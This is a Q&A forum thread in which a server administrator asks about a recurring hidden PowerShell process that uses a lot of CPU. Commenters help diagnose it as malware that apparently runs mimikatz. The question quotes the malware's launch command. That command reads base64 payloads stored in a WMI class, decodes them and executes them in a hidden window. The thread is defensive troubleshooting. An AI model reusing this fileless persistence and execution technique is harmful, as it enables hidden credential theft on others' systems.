3

I'm facing this problem recently:

My server gets very slow, I went to check and see one instance of PowerShell using a lot of the CPU. I force the task to end and after some hours it comes back.

The script that it's being executed:

powershell -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:Win32_TaskService').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command  -ScriptBlock $RemoteScriptBlock -ArgumentList ($mon, $mon, 'Void', 0, '', '')"

Anyone knows what is this and how to stop it from being executed?

Deeh
  • 131
  • 7
  • Looking at [this](https://social.technet.microsoft.com/Forums/windows/en-US/de86f13b-74f0-424c-8169-62750d3fe7c4/powershell-high-cpu-end-task-every-90-minutes?forum=winserverpowershell), its not good. At best it's a leftover from an installation of gateway monitoring software, at worst, it's a trojan. Can you post the output of `([WmiClass] 'root\default:Win32_taskService').Properties['funs'].Value`? – Lieven Keersmaekers Nov 22 '17 at 11:43
  • I don't know much about PowerShell, but I tried using echo and the output is a lot of random characters, really big, it doesn't stop printing on the screen. Some part of it: B4ODcNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFdNSV9jbGllbn – Deeh Nov 22 '17 at 11:47
  • It's base64 encoding. You can decode this wrapping it around `[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(([WmiClass] 'root\default:Win32_taskService').Properties['funs'].Value))` – Lieven Keersmaekers Nov 22 '17 at 11:52
  • Now, random integers are printed with line breaks – Deeh Nov 22 '17 at 12:05
  • Is there any way you can provide the output of following: `([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value` and `([WmiClass] 'root\default:Win32_TaskService').Properties['funs'].Value` so we can play with it. – Lieven Keersmaekers Nov 22 '17 at 12:10
  • Do you want the full output? It may take a while. – Deeh Nov 22 '17 at 12:21
  • I tried this solution: https://community.spiceworks.com/topic/2080003-malicious-powershell-script-causing-100-cpu-load-solved?page=1#entry-7336947 Apparently, the log reports that the server is clean now, but I'll reboot it soon and see what happens in the next few days. Thank's for your time. – Deeh Nov 22 '17 at 12:40
  • 1
    Thanks for the link. Please do reset your passwords. Amongst other things, that script runs mimikatz which is extremely good at getting passwords from memory. You should assume all passwords are breached. – Lieven Keersmaekers Nov 22 '17 at 12:44

0 Answers0